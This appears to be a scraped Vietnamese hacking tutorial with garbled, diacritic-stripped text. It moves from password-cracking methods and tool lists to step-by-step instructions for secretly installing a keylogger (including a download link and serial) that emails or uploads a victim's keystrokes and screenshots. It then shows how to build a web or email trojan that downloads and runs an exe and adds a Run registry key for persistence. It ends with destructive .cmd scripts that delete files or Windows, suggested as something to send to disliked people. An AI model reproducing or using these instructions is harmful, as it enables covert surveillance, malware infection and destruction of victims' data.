Crack Password

Download Crack Password

Post on 13-Jul-2015

552 views

Category:

Documents

1 download

Embed Size (px)

TRANSCRIPT

<p>5. Hacker ly mt khu ca bn qua nhng phng php. - Xem bn g mt khu - Tm xem bn c ghi mt khu ca mnh ra giy hay khng - on mt khu da vo cc s quen thuc nh: 123456, 654321 - S dng phng thc tn cng Brute Force + y l phng thc tng hp cc k t ln lt tn tm ra mt khu. - S dng phng thc tn cng Dictionary Attack + Phng thc tn cng ny tm mt khu trong mt b t in c sinh ra trc . - Cch to ra mt mt khu kh: + Chng hn mt khu ca ti ban u nh t l: yeuemnhieu + Gi ti vit hoa ch Y v ch U thnh: YeUemnhieU + Ch E trong bng ch ci ng v ch 5 mt khu ti thnh: Y5U5mnhi5U + Ch i ti i thnh ! mt khu thnh Y5U5mnh!5U + Password ca ti 10 k t c s, c hoa, c thng, c k t c bit. 6. Xa Password c lu trong vWindows XP - Vo run g: Rundll32.exe Keymgr.dll, KRShowKeyMgr - S hin ra bng tng t di y v bn hy xa ht nhng mt khu c lu trong h thng.</p> <p>7. Ph mt khu tng qut - V nh ngha mt Password Cracker l chng trnh c th gii m c mt khu hay c th v hiu ha c mt khu. - Password Cracker c hai phng php chnh l: Brute Force v Dictionary Attack, ngoi ra hin nay mi c chng trnh ph mt khu thng minh hn hai kiu c in trn l phng thc tm Password: Smart Table Recovery p ng tc tm mt khurt nhanh. - Password Cracker cng c th l mt chng trnh dng gii m nhng mt khu c m ha, v nh cc mt khu c lu trong IE, Firefox, 8. Mc tiu ca cc chng trnh tm mt khu. - Trn h thng Windows v Linux c hai ti khon ton quyn trong h thng l: root v Administrator, v mc tiu tn cng l tm c password ca hai ti khon - Khi tm c Password ca ti khon c quyn qun tr k tn cng s ton quyn vi my ch. - K tn cng cng c th dng cc phn mm Sniffer tm cc gi tin Username Password c truyn i trong h thng mng. - V nh hng ca vic b chim mt quyn qun tr ty thuc hon ton vo d liu v cc ng dng trong ht hng. 9. Chng trnh Password Cracker hot ng nh th no</p> <p>- hiu c mt Password Cracker lm vic nh th no chng ta cn phi hiu c cc chng trnh qun l Password thc hin ra sao. Hu ht cc chng trnh qun l Password u m ha Password theo mt phng thc no . - Mt khu sau khi c to ra v lu vo trong h thng s c m ha, h thng s cha Key gii m mt khu. - Nhng phn mm Password Cracker s tm cch ly c cc on mt m . -Sau khi ly c cc on mt m trn my ca nn nhn chng s tin hnh gii m mt khu bng nhng phng thc c th cho tng tnh hung. 10. Cc dng Password Cracker - Dictionary Attack: Tm mt khu trong mt file t in to sn - Brute Force Attack: Tm mt khu bng cch t hp cc k t - Hybird Attack: Lai gia hai phng thc trn - Smart Table Recovery Attack: Phng thc tn cng tm mt khu thng minh nht da trn cc bng d liu Khong 700MB d liu text. 11. Tm Password bng phng thc n gin - on mt khu - Thay th on URL 12. Tm Password bng gii m Cookies - Vi chng trnh CT cookie Spy 2.0 - Cookies thng lu li rt nhiu thng tin quan trng ca ngi dng khi truy cp vo Internet nh Username v Password truy cp vo mt Website. - Vi phn mm ny bn c th tm kim cc Cookies c lu d trong h thng v gii m chng tm Username Password.</p> <p>13. Tn cng Dictionary Attack. - To t in dng phn mm: Dictionary Maker</p> <p>14. Danh sch cc Tools Password Crackers -Lophtcrack WebCracker</p> <p>- John The Ripper Munga Bunga - Brutus ReadCookies - Obiwan SnadBoy - Authforce WinSSLMiM - Hydra RAR - Cain &amp; Abel Gammaprog Hu ht cc tools ny u min ph v nu c ph th hon ton crack c mt cch d dng Hu ht chng u c kh nng s dng tt c cc loi tn cng trn, u c th Export Username Password t mt h thng Local hay Remote. - Theo kinh nghim ca ti hay dng l: Cain &amp; Abel tuy nhin phn mm ny mnh v gii m v Sniffer hn. Lophcrack c l crack kh nhanh bt k password no di di 10 k t my tnh ca ti ch cn khong hn 1 gi l c th gii m c. - John the Ripper y l phn mm chuyn ph mt khu trong mi trng Unix v s dng m ha DES, Extend DES, MD5 cng tch hp nhiu phng php gii m. - Brutus l mt chng trnh Online hay Remote Password Cracker. Tn cng ti mt h thng nh my ch IIS, Windows, Modem ADSL. Chng th ln lt Username v Password nht nh tn cng vo my ch - Obiwan khc phc nhc im ca Brutus l c tr khi s dng Username Password sai. - Authforce da vo HTTP Basic Authentication h tr vic th Username Password ti mt site nht nh - MessenPass c th gii nn c hu ht cc ti khon cht nh Yahoo, MSN</p> <p>Lu t phin bn YM 7 password khng bao gi c lu my Local ln phn mm ny khng crack c. - Wireless WEP Key Password Spy y l mt tools h tr gii m truy cp vo mt h thng mng vWireless t mt khu. Theo Vnexperts Research Department assware Kit Enterprise sn tm password ca cc ng dng thng gp nh: Excel, Word, WinZip, Windows XP/2000/NT, Access, Outlook, Quicken, WordPerfect, VBA, 1-2-3, ACT!, Paradox, Organizer, Schedule, WordPro Passware Kit cn c cc tnh nng sn c password ca 6 ng dng khc l SQL, BestCrypt, Network Connections, MYOB 2005, Quicken 2006 v FileMaker 8. Chng trnh cho php bn ly li password ca cc nh dng tp tin (Recover File Password), nhng ng dng lin quan n h thng mng (Recover Internet and Netwword Password, Windows Reset Windows Administrator Password). Bn ty chn th cn ly li password trong thanh File. Ngoi ra, thanh ny cn c ty chn Search for Protected File tm qut cc tp tin b kha. Recover File Password: Phc hi password cho cc tp tin</p> <p>Chc ny ny gip bn phc hi hu nh tt c nh dng tp tin ang c hin nay, nh: Word (d*.doc, *.docx), Exel (*.xls, *.xlsx), Powerpoint (*.ppt, *.pptx), WinRAR (*.rar), WinZip (*.zip), *.pdf,</p> <p>u tin, bn vo File &gt; chn Recover File Password (Ctrl + O), ri tm tp tin b kha cn ly li password. Sau , nhn vo Run Wizard m thut s tra password. Ti , chn I know not thing about the password (nu cha bit bt c thng tin g v password cn tm), ri nhn Finish chng trnh tm kim. Hoc dng cc ty chn cn li (nu bn c cht thng tin no v mun cung cp thm cn c cho chng trnh truy tm password), ri nhn Next v tin hnh cung cp.</p> <p>Recover Internet and Netword Password: Phc hi password cho cc ng dng lin quan h thng mng Bn cng chn bng cch vo thanh File, ri chn tip ng dng cha ti khon cn ly li password. Ngay lp tc, chng trnh s chy a ra kt qu.</p> <p> l hai chc nng thng dng ca PRE, ngoi ra cn c cc tnh nng hay khc ang ch bn khm ph! Lu :</p> <p>Tc truy lng password nhanh hay chm ph thuc vo s k t v cc k t nh th no. Nu s k t t v khng cha cc k t c bit (nh: @, #,) th tc s nhanh hn, v ngc li.Download Passware Kit Enterprise 9.5 - sn tm password ca cc ng dng</p> <p>Note: - Chng ti khng cung cp cc cc phn mm Crack. Khng ph bin cc bn s dng cc phn mm b kha. Mi trch nhim cn li l ca bn khi s dng phn mm ny. - Cc phn mm cung cp trn Website l do cc thnh vin ng gp, submit. Nu bn nhn thy nhng phn mm no khng hu dng, hoc cha m c xin hy thng bo cho BQT website bit sm gii quyt. - an toan, my tnh ca bn cn trang b cc phn mm tm, dit virus - trojan v cc phn mm xu khc trc khi ti cc phn mm trn Internet.T kha phn mm Passware Kit Enterprise 9.5 - sn tm password ca cc ng dng thng c tm thy</p> <p>Passware Kit Enterprise 9.5 - sn tm password ca cc ng dng Tai phan mem Cch 1 : dng keylog ci trc tip vo my hay nht l dng perfectkeylogger ca cng ty blazingtools down y http://www.freewebtown.com/quang031/i_bpk2003.exe hng dn y 1Du tin l ci t a)Bn cilck vo file exe setup b)khi set up my s hoi bn t tn file l g theo ti bn c t tn l Readme(t na tui s gii thch nguyn nhn sau).Bn ien thng s sau ========================</p> <p>username : pvthanh serial : WEJJ-XVJP-QVPI-CSRP )View the log:Cho bn xem cc tho tc bn s dng trn bn phm 2)Hide progam icon:cho phep bn chon n hay hin icon trn taskbar 3)password:t password cho chng trnh ,khi nhp ng password th mi c quyn s dng chng trnh 4)Exit thot khi chng trnh ch n s khng theo di bn phm na nu nh bn bm exit Cn li l hai chc nng cc k quan trong b)logging:gm cc chc nng sau password:nh trn viewlog:nh trn clearlog:gip lm sch cc ghi chp trn bn phm of c/t c)Screenshots Chp nh mm hnh.Bn c th iu chnh thi gian chp anh 1 ln cn nu khng mun th bn khng chn Enable visual..... d)email:cc k quan trng schedule:chon thoi gian gi mt ln(,Try to send logs by email every.. thoi gian c tnh t khi victim online) loi file, dung lng gi(n chng bao nhiu KB s gi 1 ln log size ) sendto:a ch mail ca bn vd: RUOIBU@gmail.com SMTP server ca gmail gsmtp183.google.com cn ca yahoo th mnh khng nh post number:gi nguyn username:tn hp mail ca bn vd RUOIBU passwordassword hp mail ca bn auto..:chn none Xong xui ri bn hy click vo sendtest nu bo l thnh cng th ok ri Ti phn FTP: ci ny dng upload ln web,cng rt hay v c 1 s phn mm chng cc chnmg trnh c chc nng gi mail(BKAV...) nn dng ci ny c v hay Hostname:tn host vd:ftp.vandon.homeip.net ( ca tui) =&gt; nhng ni tht bn ny dng thng k c my ( m d text c qua kinh nghim hi ) username:tn s dng password: xxxxx Alert: phn ny c chc nng gi mail cho bn ngay lp tc khi n "tm thy nhng t hay cm t m bn qui nh di (bn c th Add keyword ty ) khi Victim typing trn my ca victim . Phn di l 2 la chon : Send email notification (bt buc chn nu bn mun program gi mail cho bn) v Make a screenshot (chp hnh monitor ca victim , chon hay ko ty bn) . Nhng c 1 lu nho nho , bn nn add keyword di di hay keyword m bn nghi l victim c th nh (nh trong phn password,hay chat vi ai chng hn) ,</p> <p>B)Remote install ( to ra con trojan cc tuyt) c ai mun th k trojan =&gt; bay gio xong roi do ban upload nen mang thoi co gi ko hieu nhan lai cho toi ri v by gi l kt qu n Cch 2 : to trojan hack ngha l cc bn to ra 1 con tng t nh virus , bn em pht tn ln mng ...nh my thng u n hay gi ln cc din n la g Khi in y cc thng tin phn Options xong bn vo mc Remote Installation.... to con trojan --&gt; Next --&gt; Next--&gt;Browse bn chn 1 file no c th la file .exe hoc file nh ....Tip bn chn Next Finish .. khi no to xong file nhim trojan th up ln 1ci host free no CC BN HY C K PHN HNG DN BN TRN Con Trojan m cc bn to ra c th chp nh mn hnh ,, K c bn phm o ca v lm .. mnh th nghim v rt thnh cng chnh acc ca mnh ... chc cc bn thnh cng!!!! Bn mun chy t ng 1 trojan trn my tnh ngi khc khi h xem trang Web hoc Email ca bn...! C cch no khng??? D nhin l c ri! Bi vit ny s gip bn gii quyt vn ! 1) Hng dn: Bc 1: chun b mt file trojan.exe, kch thc khong 5 - 40Kb. Nu bn khng c trojan, bn c th ti v t trang TlSecurity.com hoc t vit mt file trojan.exe xi! Bc 2: chy convert16.exe convert file trojan.exe sang trojan.hex Bc 3: dng 1 trnh son tho vn bn dng text( nn dng EditPlus, n rt hay!) sa file temp.htm nh sau: Thay phn .doc=4D5A900... 64620000 thnh .doc= VD: .doc=9631447da55abcd44ac25... Bc 4: Nhng file ni dung file temp.htm sau khi sa vo trang Web hoc Email v gi n cho ngi khc!</p> <p>2) M ngun:</p> <p> Files: tempsrc.hta dng extract v execute trojan.exe tempsrc.htm file htm chnh convert16.vbp &amp; convert16.frm : file ngun ca chng trnh Convert 16, c vit bng Visual Basic 6, dng convert file .exe sang file .hex</p> <p> Nhng vn chnh:</p> <p> K thut Convert 16: dng to 1 file nh phn, v d nh trojan.exe Chuyn m ANSI ca k t sang h c s 16 hexa. T m ANSI ca k t h 16 chng ta d dng chuyn v li k t ban u. d hiu, ti a ra v d sau:</p> <p>K t L P T V C l u b 2 0 0 1 M ANSI h 10 76 80 84 86</p> <p>32 67 108 117 98 32 50 48 48 49 M ANSI h 16 4C 50 54 56 20 43 6C 75 62 20 32 30 30 31</p> <p>Encode16 Decode16 LPTV Club 2001 4C50545620436C75622032303031 LPTV Club 2001</p> <p>--- VBScript Code ---</p> <p>function encode16(st) for i = 1 to len(st) temp = hex((asc(mid(st,i,1)))</p> <p> mid(st,i,1) ly 1 k t trong chui st v tr th i asc(mid(st,i,1)) tr v m ANSI ca k t ny temp = hex((asc(mid(st,i,1))) s cha m ANSI h 16 ca k t if len(temp) = 1 then v m ANSI ca k t ch nm trong khong t 0 n 255 (0h-FFh), nn nu di ca temp=1 chng ta s thm 0 vo trc! V d: 0A, 07, ... temp =0 &amp; temp end if encode16 = encode16 &amp; temp next end function</p> <p>function decode16(st) for i =1 to len(st) step 2 nh trn, mi k t c m bng ng 2 k t nn bc nhy step = 2 decode16 = decode16 &amp; chr(&amp;h &amp; mid(st,i,2)) mid(st,i,2) tr v 1 chui gm 2 k t, bt u t v tr th i trong chui chr(&amp;h &amp; mid(st,i,2)) tr v k t c m ANSI h 16; &amp;h dng ch h 16 next end function --- VBScript Code ---</p> <p> K thut Encode: c s dng trong file temp.hta &amp; temp.htm</p> <p> Mc ch:</p> <p>+ gim kch thc file + lm cho m lnh kh c i vi ngi khc</p> <p> V d: thay v vit lnh r rng:</p> <p>on error resume next dn=chr(34) xd=vbcrlf set wsh=createobject("wscript.shell") set fso=createobject("scripting.filesystemobject")</p> <p>Chng ta cng c th vit li nh sau:</p> <p>on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")</p> <p>Bn thy m lnh nh hn trc v c kh c khng?</p> <p>3) Hi/p:</p> <p> C th gn virus hoc 1 chng trnh khc thay cho trojan khng?</p> <p>D nhin l c ri! Bn th ngh li xem, file virus, trojan.exe hu nh u l cc file .exe chng trnh c kh nng t thc thi nn bn hon ton c th thay i theo mun ca bn!</p> <p> Nu ti gn 1 file trojan.exe ln trong file temp.html , file ny s ln kinh khng, ngi khc c th nghi ng! Vy lm sao by gi?</p> <p> Ti mun my h t ng download file trojan.exe t trn mng v v execute n? C c khng?</p> <p>Rt d! Thay v phi gn file trojan.exe, chng ta s gn 1 file chng trnh nh khong 5 KB. Nhim v ca file ny l download trojan.exe t http://www.somewhere.com/yoursite/trojan.exe v thi hnh n! Bn nn sa li m ca file .hta mt cht!: b lnh xa file temp.exe v thm lnh to registry-startup cho file temp.exe! ... wsh.regwrite HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32,filetrojan ...</p> <p>Bn c th s dng chng trnh Web Dowloader gii quyt vn trn! Ti c gi km chng trnh Web Dowloader trong tp hng dn ny, file Webdownloader2.0.zip</p> <p> C th chy trojan.exe ngay sau khi ngi khc c trang Web hoc Email m khng cn h khi ng li my tnh khng?</p> <p>Hon ton c th c! Nhng trong phm vi bi vit ny, ti khng mun cp n!</p> <p>Chc cc bn thnh cng! u tin, bn hy th 1 cht mo vt ny hu r hn v con virus m bn sp sa to:</p> <p>Thng thng khi mun xa hn 1 file no m khng th cu li th cc bn phi nh n cc soft chuyn dng xa File ( nh Blannco Shreader, Unlocker......), tuy nhin trong Win bn vn c th xa hn file bng cch to 1 tp tin .cmd Bn hy m notepad, paste on code ny vo Trch dn:DEL /F /Q * , sau lu li vi bt c tn no bn mun nh dng .cmd. Vi file cmd ny khi kch hot n s xa sch tt c cc file c trong my tnh cho d l file read only hay l bn ko c quyn tip cn n. Bn s ko bt c hu qu ca n ra sao nu bn ko kch hot n. Cnh bo: ng kch hot n!!! Bn hy lm 1 v d nh thy tc dng ca n: hy to 1 file bt k trong bt k th mc no ( y xin v d to file C:\test.txt ). M notepad, paste on code Trch dn:erase C:\TEST.txt vo, lu li di dng file .cmd vi bt c tn no. Ok by gi bn kch hot n, bn s thy trong C:\ s ko cn file test.txt. n y chc bn v l ra nhu iu, v by gi l cng vic chnh --&gt; to 1 con virus ph hoi: Hy m Notepad, past on code Trch dn:erase C:\WINDOWS hoc C:\LINUS nu l HDH Linus lu li nh dng .cmd vi 1 ci tn hp dn no ( anhyeuem, emyeuanh,love,readme......) V cng cnh bo bn ng kch hot n trong my tnh ca ban!!! Bn hy gi cho ngi no m bn ght nht, khi ngi kch hot n.......oops ,xin hy vui lng ci li my!!! V gi l virus, 1 con virus n gin nhng hu qu ca n th khng n gin cht no. Mt ln na mnh mong cc bn coi y l 1 kinh nghim m trnh ch ng p dng n nhe!!! P/s: Cc bn c th to 1 file .cmd vi cch nh trn nhng vi on code Trch dn:ATTRIB +S /F /Q * n ton b cc file trong Win, ko ai c th tip cn my tnh ca bn tr khi thit lp li ci t.</p> <p>cch lm nhng file virus n ginu tin cc bn m notepad v chn mt trong nhng on m sau, cc bn copy on m vo notepad v lu di ui VBS(nu ko dc th lu vi ui . cmd). v d: slm.vbs</p> <p>chng hn.. * m ra mt thng ip vui sau...</p>